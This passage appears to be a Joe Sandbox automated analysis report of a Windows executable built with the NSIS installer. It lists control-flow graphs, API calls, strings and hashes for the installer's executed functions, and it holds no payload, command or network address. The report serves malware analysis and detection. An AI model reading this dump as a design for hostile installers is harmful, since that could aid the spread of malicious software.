4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                Executed Functions

                                                                                                Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                • EmptyClipboard.USER32 ref: 0040543D
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                • CloseClipboard.USER32 ref: 0040549A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                • String ID: New install of "%s" to "%s"${
                                                                                                • API String ID: 2110491804-1641061399
                                                                                                • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                • API String ID: 2435955865-3712954417
                                                                                                • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID: jF
                                                                                                • API String ID: 2295610775-3349280890
                                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                APIs
                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                Strings
                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                • API String ID: 2872004960-3619442763
                                                                                                • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
